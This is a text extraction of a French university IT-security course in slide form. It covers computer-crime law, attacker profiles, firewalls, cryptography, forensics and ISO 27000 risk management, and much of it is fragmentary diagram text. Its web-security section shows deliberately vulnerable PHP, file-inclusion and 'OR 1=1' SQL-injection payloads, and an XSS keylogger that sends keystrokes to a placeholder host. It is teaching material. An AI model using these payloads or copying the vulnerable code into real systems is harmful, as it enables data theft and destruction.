Cours Securite Admisys PDF
Cours Securite Admisys PDF
Cours Securite Admisys PDF
March 2, 2020
Accès et maintien :
Pénal : Art 323-1 : 30 000 e, 2 ans de prison
si en plus altération : 45 000 e, 3 ans de prison
si en plus STAD de l’état : 75 000 e, 5 ans de prison
Entrave au système d’information :
Pénal : Art 323-2 : 75 000 e, 5 ans de prison.
si en plus STAD de l’état : 100 000 e, 7 ans de prison
Possession d’outils de piratage :
Pénal : peines identiques aux infractions "possibles".
Pour résumer
"Pas vu, Pas pris
Vu : Niqué !"
Protéger l’entreprise
Y compris sa version non informatique
Par des moyens informatiques
Si vous n’en êtes pas convaincus, essayez d’en convaincre vos
interlocuteurs.
Evaluer
Les difficultés
Le contexte
Quels sont les risques ?
Quelles sont les menaces ?
La sécurité se mesure-t-elle ?
Définir les rôles : politique de sécurité
Qui fait quoi, comment et quand ?
Qui peut faire quoi, comment et quand ?
Définir un plan d’action
Quelle sont les priorités ?
Les difficultés
Le contexte
Quels sont les risques ?
Quelles sont les menaces ?
La sécurité se mesure-t-elle ?
Historique
Connexion de bout en bout
Réseau ouvert
les RFC 1122 et 1123 définissent les règles pour les machines
Accessibilité totale
On fait ce que l’on dit, et l’on dit ce que l’on fait
Signaler quand cela ne marche pas
Signaler pourquoi
Système ouvert
Finger
Rexec
Sendmail
Destruction de données
Perte de marchés
Perte de temps et donc d’argent
Risques juridiques
Comptabilité
Données clients
R & D, Conception, Production
Les PME meurent dans les 3 mois.
Exemple de Yahoo
Cause ou conséquence ?
http://riskbasedsecurity.com
Arrêt de la production
Recherche des causes
Remise en état
Lois françaises
Échanges illégaux (terrorisme/pédopornographie/P2P),
Attaques par rebond,
Confidentialité des données personnelles (Article 226-17 et
Article 226-34),
GDPR / RGPD (Règlement européen : 25 Mai 2018).
2 à 4% du chiffre d’affaire mondial
10-20 Mepour les administrations
Contrats
Disponibilité
Lois internationales
Loi Sarbanes-Oxley (US)
Réglementation Bâle II
Historique
Niveau des attaques
Types d’attaque
Déroulement d’une attaque
http://map.honeynet.org
http://cybermap.kaspersky.com
https://zone-h.org
https://www.openbugbounty.org
Niveau
Fast Flux
Utilisation de SNMP
Backdoor
Script Kiddy
90% playstation 9% clickomane 1% intelligence
utilise ce que font les autres
Amateur
Failles connues
Failles web
Professionnel
En équipe
Avec beaucoup de moyens (financiers, techniques, parfois
préparatoires)
0days possibles, voire courants.
L’argent
piratage volumétrique
cryptolocker/cryptominage
Hacktiviste
"Terroriste"
Anonymous
Espions
Etatique
Industriel
"Petit con"
Ne pas se méprendre
Si la moyenne des pirates est plus bête qu’avant,
les meilleurs pirates sont bien meilleurs qu’avant
plus psychologues (Social Engineering, virus)
plus pragmatiques (Efficacité, Argent)
plus techniques.
Chinese
TuringFarm
SCAM
Captcha
Piratage
Protection d’une
Serveur Web entreprise
Massmailing
Virus
Chantage
Phishing
crédibilisé
Bot
par mot de passe
PC Vol
d’identité Doxing
Usurpation
DDoS Racket
Déstabilisation
d’une entreprise Disparition
Pirate concurrent
Argent
Cryptolocker
Spam Viagra
Cryptominage
Spam Blog
Protection IP FAI
Firewall, Blacklist bullet proof
Intrusion
XSS
Serveur
Faux
Call Center
Site de
phishing
ou de vente
Site
médicaments
"WaterHole"
Faille Ver
Espionnage
Game Cracking
Jeu
Cheat
https://zerodium.com/program.html
https://zerodium.com/program.html
source https://www.bleepingcomputer.com
Saturation de la CPU
10 zombies mais les machines sont "grillées", connaissances
pointues
exemple: requêtes SQL massive
Lutte : limitation de la CPU (noyau), mod_evasive (http)
Plantage distant
1 zombie. Expertise nécessaire
Empoisonnement des caches CDN
Patch régulier, durcissement noyau, protection applicative
source
https: // pasillo. renater. fr/ weathermap/ weathermap_
metropole. html
[email protected] Sécurité Informatique/ March 2, 2020 60 / 459
La protection DDoS
Collecte d’informations
Repérage des vulnérabilités
Utilisation des vulnérabilités → intrusion
Accession aux droits administrateur (escalade)
Camouflage
Installation d’une backdoor
10 k
0
dim. mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven. dim.
7 k
6 k
5 k
4 k
3 k
2 k
1 k
0
dim. mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven. dim.
source
https://www.bleepingcomputer.com
source https://krebsonsecurity.com
http://www.shodan.io
https://censys.io
https://www.zoomeye.org
Politique de sécurité
Le web est autorisé pour qui, pour quoi ?
Qui peut utiliser la messagerie ?
Qui définit les règles ?
Qui les annonce et comment ?
Quelles sont les sanctions ?
Tenter l’impossible
Faire du tout sécuritaire
Efficacité
100%
Coût :
●Financier,
0% ●Compétence,
●Désagréments
Rappel
Votre but est que "votre organisme fonctionne" pas de
concurrencer Fort Knox
Optionnel
En cas de recours en justice
A notre initiative
Mais aussi à notre encontre
Tâche ingrate et rarement effectuée
Réputation
Argent
Temps
L’attaque a réussi
Pourquoi ?
Comment y remédier ?
Parer à la faille utilisée
Réfléchir à une généralisation de cette faille
La tronçonneuse
Le ciseau à bois
Le papier de verre
La lazure
On enlève l’inutile :
Protection contre l’extérieur;
Protection contre l’intérieur;
Protection à l’intérieur.
Les journaux sont nos seuls amis. On va donc faire appel à eux
pour
Les machines internes qui déclenchent des alertes.
Les services qui sont auscultés par l’extérieur
Les alertes récurrentes
De nombreux noms
Firewall
Garde-Barrières
Gatekeeper
Qu’est-ce que c’est ?
Comment ça marche ?
Evaluer et choisir un pare-feu
Définition réseaux
Types de pare-feux
Types d’architecture
Critères de choix
Perspectives
La sortie
Qui ?
Pour quoi ?
L’entrée
Qui ?
Pour quoi ?
IP
ICMP
La notion de port
TCP
UDP
Protocoles
Protocole de communication
Actuellement en version IPv4
IPv6 en cours de déploiement (Free depuis Décembre 2007)
Chaque machine sur Internet a une adresse IP unique
Les paquets se propagent de routeur en routeur
Protocole non fiable mais résistant
Adresse IP source
Adresse IP destination
Données
Protocole de signalisation
Service/machine/réseau injoignable
Demande de ralentissement
Peut être utilisé pour les attaques
ICMP Redirect
ICMP Echo
Attaque smurf
Dénomination
Port destination : port du destinataire
Port source : port de l’expéditeur (provenance du paquet)
Client Serveur
65535 65535
… …
49152 49152
49151 49151
… …
1024 1024
1023 1023
… …
1 1
Protocole connecté
Assure la cohérence de la connexion
A un début et une fin
Un "triple handshake" initialise la connexion
L’aléa du numéro de séquence n’est pas toujours bon
S’il est prévisible, on peut "simuler" une connexion
Client Serveur
Choix du SYN (1000) Choix du
N° SEQ SYN (2000),ACK(1001) N° SEQ
ACK(2001)
Communication Etablie
Tout paquet possède un ACK
ICMP (<1%)
IP
Règle 1
Règle 2
Règle 3
Règle 4
Règle 5
Règle 6
Règle 7
Règle 8
Règle 9
Règle 10
Règle 11
Règle 12
Règle 13
Règle 14
Règle 15 Pas d ’arrêt sur correspondance
Règle 1 Règle 2
Règle 2 Règle 4
Règle 3 Règle 6
Règle 4 Règle 7
Règle 5 Règle 5
Règle 6 Règle 3
Règle 7 Règle 1
192.168.0.0/16 ==> 10.0.0.0 PAS OK 192.168.1.0/24 ==> 10.0.0.0 OK
192.168.1.0/24 ==> 10.0.0.0 OK 192.168.0.0/16 ==> 10.0.0.0 PAS OK
Règle 1
Règle 2 Règle 2.1
Règle 2.2
Règle 2.3
Règle 2.4
Règle 3
Règle 4
Règle 5 Règle 5.1
Règle 5.2 Correspondance
Règle 5.3
Règle 6
Règle 7
Règle 8 Règle 8.1
Règle 8.2
Règle 8.3
Limitation de débit
Eviter les abus internes
Limiter les rebonds de flooding
Journalisation
du refus
des paquets refusés
IOS cisco
Filtre commutateurs et routeurs
Iptables (mais peut faire mieux)
Pktfilter sur windows 2K/XP/2003
De manière générale : tout filtre accéléré par ASIC
Les virtualhost
Les VPS
Les CDN (Akamaï,Fastly, etc.)
qui à l’IP 193.51.224.6 ?
crl.microsoft.com
www.france2.fr
CloudFlare
Super contre les DDoS
Les pirates l’ont bien compris.... ils l’utilisent.
Interface(s)
Interface(s)
FORWARD
User-defined
INPUT OUTPUT
User-defined
Processus
Filtrage en entrée
Autorisez du ssh, puis du ftp passif et du ftp actif
Filtrage en sortie
Autorisez du ssh, puis du ftp actif et du ftp passif
Serveur IP-S
Port-S Critère d ’état, Timeout
Paquet 1
IP-C:P-C / IP-S:P-S / NEW / 29
Paquet 2 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /
Paquet 3 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /
Communication
Communication
Paquet 1500
IP-C:P-C / IP-S:P-S / ESTABLISHED / 179
Paquet 1501
IP-C:P-C / IP-S:P-S / ESTABLISHED / 179
Rien pendant 300 sec
RIEN ==> Timeout
Paquet 1502
IP-C:P-C / IP-S:P-S / NEW / 29
Communication Etablie
PORT, IP-C,P-C2
IP-C:P-C / IP-S:P-S / ESTABLISHED / 890
200 PORT OK
IP-C:P-C2 / IP-S:20 / RELATED / 890
Externe Interne
123.45.67.89:80 10.1.1.2:3456
123.45.67.89:80 12.1.1.4:3456
123.45.67.89:80 12.1.1.4:3456
123.45.67.89:80 10.1.1.2:3456
Client C1
Serveur S1
Externe Interne
123.45.67.89:3456 12.1.1.4:80
123.45.67.89:3456 10.1.1.2:80
123.45.67.89:3456 10.1.1.2:80
123.45.67.89:3456 12.1.1.4:80
Client C1 Serveur S1
Externe Interne
123.45.67.89:80 10.1.1.2:3456
123.45.67.89:80 12.1.1.4:3456
123.45.67.89:80 12.1.1.4:3456
123.45.67.89:80 10.1.1.2:3456
Serveur S1 Client C1
11.11.11.11 :80 10.1.1.4:6789
11.11.11.11:80 12.1.1.5:6789
Serveur S1 Client C1
11.11.11.11 :80 10.1.1.4:6789
11.11.11.11:80 12.1.1.3.8002
Externe Interne
123.45.67.89:21 12.1.1.3:8001 123.45.67.89:21 10.1.1.2:3456
123.45.67.89:20 10,1,1,2,6789
10.1.1.2
!!!
Externe Interne
123.45.67.89:21 12.1.1.3:8001 123.45.67.89:21 10.1.1.2:3456
Interface(s) Interface(s)
PREROUTING FORWARD POSTROUTING
User-defined
INPUT OUTPUT
User-defined
Processus
Palo Alto
iptables + L7 Filter + NuFW (UFWi)
Maintenant tout FW est forcément NG.....
StormShield.
Tippingpoint
Snort Inline
Guardian pour iptables
Iptables et module string (très très limité)
Nombre de règles
Mise à jour des règles (qui, d’où)
Si on ne coupe pas:
Relais R
R-S
Règles Serveur S
C-R Accepte
Décision
Port
du
relais R-S2
Machine Redirige
cliente C
Interdit Serveur S2
Logs
La standardiste
C’est un relais générique
Généralement placé au niveau circuit (TCP ou UDP)
La communication C-R encapsule la communication C-S.
Le client demande au relais une communication à l’extérieur
Autorisation basée sur
l’origine (machine, port)
la destination (machine, port)
l’identification ou l’authentification du client pour tout
protocole
Lent
Tous les protocoles ne passent pas
Ne comprend pas la communication
Nécessite l’installation d’une partie cliente
Intégrée dans les outils
Intégrée dans le système par des librairies
Empêche la notion de serveur
Lutte antivirale
Filtrage d’action (put, get pour le ftp)
Filtrage d’URLs
Cache (optimisation du trafic)
Authentification
Complémentarité visible
Quelques pare-feu intègrent 2 processus
Filtrage stateful qui renvoie vers
des Relais applicatifs transparents
Dépend
De la sécurité exigée
De la vitesse nécessaire
Du budget disponible
Des exigences des utilisateurs
Rarement limité à un seul type
Ils sont très complémentaires.
Les relais ne sont rien sans des interdictions
Les architectures
Réseau extérieur
Pare-feu
Ressources privées
Ressources publiques
Zone dangereuse
Zone semi-protégée
Zone protégée
Les plus
Protège tout le réseau
L’accès aux serveurs publics est rapide
Les moins
Si le serveur public est compromis ....
Si le PF est compromis ....
Les plus
Si les serveurs publics compromis => PF
Les moins
Les serveurs publics sont moins accessibles
Si le PF est compromis ....
Les plus
Tout le réseau est protégé
Si serveurs publics compromis => PF2
Si PF1 compromis => PF2
Les moins
Les serveurs publics sont moins accessibles (sauf si PF2
filtrant)
Les plus
Moins cher
Plus facile à administrer
Même technologie pour toutes les DMZ
Les moins
Si PF compromis ...
Règles plus complexes
Combien de DMZ ?
1 pour les serveurs publics
1 pour les entrées
1 pour les sorties
....
NMAP
Services visibles par un pirate
Filterrules
Analyse des filtres réellement en place
NIDS après le PF
Vérifie que rien ne passe.
Configurer
Interface graphique ?
Console ?
A distance ?
Console d’administration centrale
Par telnet ou ssh
Sur la console ?
Le Chiffrement
Le crypt unix
"password" → "5GKtdsqlkgy"
Le CRC (Compute Redondancy Check)
le sum unix
SHA-1 (Shamir)
MD5 (Rivest)
Génération :
Alice choisit son mot de passe M1
Le système "hashe" M1 pour obtenir HASH1
Le système ne conserve que HASH1
Utilisation
Alice se reconnecte, en tapant le mot de passe M2
(normalement identique à M1)
Le système hashe M2 et obtient HASH2
Si HASH2=HASH1 alors M2=M1, donc OK
Option : on peut ajouter un "sel" pour complexifier le
craquage des mots de passe.
Alice
Algorithme Bob
Message de
chiffrement Message chiffré
Algorithme
de Message
déchiffrement
Clé
de
Chiffrement
Exemples à transposition
Code de Vigenère
XOR
Exemples à permutation
DES (64 bits), et triple DES (3DES)
IDEA
AES (actuel standard de l’armée US)
Ancien standard
56 bits (64 - 8 réservés à la parité)
version renforcée : le triple DES, mais à 2 clés. Efficacité de
113 bits
Bloc de permutation de 64 bits
http://www.securiteinfo.com/crypto/aes.shtml
Nouveau standard (il s’appellait Rijndael à l’origine après un
concours de la NSA)
Auteurs Rijmen et Daemen
Plusieurs versions de 128,192 ou 256 bits
Plus rapide que DES (il ne travaille qu’avec des entiers)
Alice
Clé publique
de Bob
Publication
sur Internet Algorithme
de
Message chiffrement
Bob
Clé publique
de Bob
Génération
du bi-clé
Algorithme
Clé privée
de Message
de Bob
déchiffrement
Message chiffré
Méthodes
R.S.A.
Diffie Helmann
El Gamal (logarithme discret)
Courbes elliptiques
Outils
PGP
GPG
Openssl
La vision en 2001 :
1982 1992 2002 2012 2022 2032
symétrique 56 64 72 80 87 95
RSA/log discret 417 682 1028 1464 1995 2629
DSS 102 114 127 141 154 168
Courbes elliptiques 135 149 164 179
Alice
Bob Message
Algo Hash Clé publique
Message Message Hash codé
Algo Chiffrement de Bob
Hash Codé
Clé privée
Hash Hash Hash déchiffré
de Bob
Algorithme
de Comparaison
chiffrement
Hash chiffré
Clé Publique
de Verisign
Verisign
Certificateur : Verisign
Clé publique Objet : Verisign
de Verisign
Chiffrement : RSA
Hashage : MD5
Hash Codé
hashage MD5
Clé privée
Hash
de Verisign
chiffrement RSA
Hash chiffré
BNP
Verisign
Vérification
identité
Clé publique
de BNP
Clé Publique
de BNP
Certificateur : Verisign
hashage MD5 Objet : BNP
Chiffrement : RSA
Hashage : MD5
Hash Codé
Clé privée
Hash
de Verisign
chiffrement RSA
Hash chiffré
Certificate:
Data:
Version: 1 (0x0)
Serial Number: 7829 (0x1e95)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc,
OU=Certification Services Division,
CN=Thawte Server CA/[email protected]
Validity
Not Before: Jul 9 16:04:02 1998 GMT
Not After : Jul 9 16:04:02 1999 GMT
Subject: C=US, ST=Maryland, L=Pasadena, O=Brent Baccala,
OU=FreeSoft, CN=www.freesoft.org/[email protected]
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:b4:31:98:0a:c4:bc:62:c1:88:aa:dc:b0:c8:bb:
...
d2:75:6b:c1:ea:9e:5c:5c:ea:7d:c1:a1:10:bc:b8:
e8:35:1c:9e:27:52:7e:41:8f
Exponent: 65537 (0x10001)
Signature Algorithm: md5WithRSAEncryption
93:5f:8f:5f:c5:af:bf:0a:ab:a5:6d:fb:24:5f:b6:59:5d:9d:
....
0d:19:aa:ad:dd:9a:df:ab:97:50:65:f5:5e:85:a6:ef:19:d1:
http://michel.arboi.free.fr/cryptFAQ
http://www.ossir.org/resist/supports/cr/200203/
crypto.pdf
http://cr.yp.to/
Elle m’a demandé une variable, le pirate répond avec une variable
... suivie d’un ordre. Si le programme n’a pas prévu le cas, c’est
foutu.
Une solution ?
[email protected] Sécurité Informatique/ March 2, 2020 316 / 459
Débordement : Condition normale
Bingo !!
[email protected] Sécurité Informatique/ March 2, 2020 318 / 459
Les applications web
Exemple d’inclusion.
Soit le programme PHP suivant
<?
include ("header.inc");
$page=$_GET[’page’]; # On récupère la variable "page"
include ($page);
include ("footer.inc");
?>
que l’on utilise de la manière suivante
Utilisation
http://192.168.30.72/mep.php?page=toto.txt
Quelques attaques :
Exemples simples d’utilisation malveillante
http://192.168.30.72/mep.php?page=/etc/passwd
http://192.168.30.72/mep.php?
page=https://dsi.ut-capitole.fr/creufophacker.inc
Utilisation
http://192.168.30.72/test_sql.php?id=3
Code du programme
$id=$_GET[’id’];
$sql_query="DELETE FROM matable WHERE id=$id";
mysql_connect($database);
mysql_query($database,$sql_query);
Code du programme
<?
$id=$_GET[’id’];
$sql_query="DELETE FROM matable WHERE id=$id AND user=’USER1’";
mysql_connect($database);
mysql_query($database,$sql_query);
?>
On ajoute un commentaire
http://192.168.30.72/test_sql.php?id=3 OR 1=1 --
Code du programme
$id=add_slashes($id);
$sql_query="DELETE FROM matable WHERE id=’$id’";
Qui ne fait plus rien. Mais ce n’est toujours pas fini. Une faille
existe malgré cela.
Je fais le malin.
Et si on saisit ?
<script>
while (1)
alert("Vas téter la prise électrique");
</script>
Spécifique IE
<bgsound onpropertychange="code Javascript">
<script language="javascript">
var keys=’’;
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = ’http://hack.com/keylogger.php?c=’+keys;
keys = ’’;
}, 1000);
</script>
http://www.beefproject.com
Un constat
beaucoup d’applications sont livrées "telles quelles"
il y a souvent un historique lourd
les applications sont "mouvantes".
les développeurs ne sont pas souvent formés.
Ce que l’on a
FIDO et Yubikey
RSA SecurID
Ce que l’on est
lecture d’empreintes digitales (ou de carte veineuse)
lecture d’iris de l’oeil
reconnaissance du visage
vitesse de frappe sur les touches
La récupération :
froide ou chaude ? morte ou vivante ? In vivo, In vitro ?
De toute manière, cela se prépare.
physiquement (du matériel, des logiciels)
intellectuellement (des procédures, de l’entrainement)
psychologiquement (de l’entrainement)
juridiquement (un règlement intérieur, une analyse juridique)
C’est quoi ?
On laisse l’intrusion se dérouler
On analyse le plus en direct possible ce qui se passe
Capture de la mémoire à un instant T
Analyse des flux réseaux (sonde, etc.)
Analyse des actions
Tentative d’interception de ce trafic
Pourquoi ?
Le pirate a sans doute déjà fait du déplacement latéral
On peut comprendre ce qu’il sait et récupérer des IoC
(indicateurs de compromission) que l’on utilisera plus tard
On pourra toujours faire de l’analyse froide après.
Pourquoi pas ?
C’est dangereux (risque de perte de preuves)
Cela nécessite des compétences plus élevées
Cela nécessite des matériels et logiciels adaptés
Il faut mettre en place des procédures de protection "en live"
et sans trop alerter le pirate
C’est très très stressant.
C’est quoi ?
On coupe tout
On analyse sereinement les disques, les journaux et les traces.
Pourquoi ?
C’est moins risqué pour le SI (cryptolockeur destructeur de
sauvegardes)
C’est moins compliqué.
C’est moins risqué pour les preuves.
Pourquoi pas ?
On va perdre des informations
C’est quoi ?
Tout ce qui peut-être entre les deux
Pourquoi ?
Parce que rien n’est absolu
Comment ?
Cela va dépendre de la situation.
Passer en hibernation les postes compromis (on conserve une
partie de l’image de la mémoire) pour l’envoyer à un
prestataire.
Complètement "firewaller" la zone compromise et bloquer.
etc.
TP : Clé USB
Outils
photorec
recuva
Outils
Directe : dump2it
Indirecte (hibernation) : hib2dmp
Outils
Volatility (sous linux)
Les authentifications
Les méta-données de communications
Les "indicateurs" de communication
C’est souvent HAUTEMENT réglable.
Vérifier sa sécurité.
Pourquoi ?
Leur montrer comment réagissent leurs outils de sécurité (et
ainsi éviter les "fake").
Leur faire prendre conscience de la sécurité,
Les rendre autonomes,
Les rendre "détecteurs d’incident".
Comment ?
Déclencher une alerte avec http://eicar.com pour l’antivirus
Tester le firewall local avec grc.com
Voir le repérage des spams, phishing, etc.
Pourquoi ?
Parce que c’est une valeur importante de l’entreprise,
Parce ce que cela peut faciliter ou compliquer voire interdire
la communication avec les clients.
Comment ?
Voir la réputation mail avec
mxtoolbox pour savoir si l’on est blacklisté
backscatter pour repérer nos refus de mails fautifs
chez CISCO
Voir la réputation web avec
chez McAfee
Avons nous une zone DNS propre ?
Mais attention :
Vérifiez que vous avez le droit de tester (serveur mutualisé ou
hébergé),
Vérifiez la compétence (réputation, autres clients, etc.),
Ne pas choisir l’option "je paye uniquement si vous trouvez"
(les 0days s’achètent !!!)
Définissez bien le périmètre (géographique, opérationnel,
temporel etc.),
TEST = RISQUE,
Plus vous en savez, mieux vous serez servis.
Par manque de temps, ces sujets n’ont pas été traités. Ils sont
indiqués afin que vous puissiez vous renseigner dessus.
Les VPN (IPSEC, VPN-SSL, openvpn)
La sécurisation d’une structure AD
La sécurisation des accès (filaire ou wifi)
Les portails captifs (et leurs limites avec le HTTPS)
Le 802.1x (avec le protocole EAP et surtout PEAP)
La gestion des spams
La gestion du phishing
Habituer ses utilisateurs
Limiter les dégâts (détection de l’origine des connexions)
La lutte antivirale
Les limites des antivirus
La détection et le blocage post-infection (DNS, Squidguard)
Bien essentiel
Bien support
Evenement redouté
Besoin de sécurité
Source de menaces
Vulnérabilité
Impact
Vraisemblance
Gravité
source Guide Ebios ANSSI
Critères DIC
Disponibilité
Intégrité
Confidentialité
Imputabilité (complément)
Traitement du risque
Refus du risque
Transfert du risque
Traitement du risque
Risque résiduel
Prise de risque
(primary asset)
Ressource ayant une valeur pour l’organisme, voire être son
socle d’existence
Elle peut être matérielle (composant) ou immatérielle
(données, processus)
Elle est en général "portée" par un bien support
Elle a des besoins de sécurité
par exemple
Liste de clients
Données R&D
Données de santé
Capacité à fournir de l’accès Internet
Fournir des diplômes
Pourquoi ?
Besoin de définir des bonnes pratiques (pas de notion d’absolu
!)
Besoin de parler de la même chose
Besoin de certification (évaluation) commune
Evaluation des hommes (pour le recrutement)
Evaluation des entreprises (pour la publicité, ou les cercles de
confiance)
Appliquer à la sécurité les principes de la qualité
C’est quoi ?
Tradition anglo-saxonne
Objectif : s’améliorer, RIEN DE PLUS
Roue de deming (PDCA)
Plan : je prévois ce que je vais faire
Do : je fais ce que j’ai prévu
Check : je vérifie (mesure) que j’ai fait ce que j’ai prévu
Act : je constate ce qui n’a pas marché pour le corriger
On recommence
Concept associé aux normes ISO 9001
Ce sont des documents payants à récupérer sur le site de l’ISO
: 100 à 150 €
Pourquoi ?
ISO 27000 : Le vocabulaire
ISO 27001 : Le système de gestion de la sécurité SMSI
ISO 27002 : Les bonnes pratiques de la sécurité
ISO 27003 : Installation d’un SMSI
ISO 27004 : Indicateurs et tableaux de bord
ISO 27005 : La gestion du risque
ISO 27006 : Les audits de sécurité
ISO 27007 : Guide pour l’audit d’un SMSI
Audits et revues
Publiée en 2014
Continuité d’activité
Publiée en 2011
Basée sur un British standard (BS 25999) et le (BC/DR
SS507) singapourien
Cybersécurité (Internet)
Publiée en 2012
Sécurité Applicative
Publiée en 2011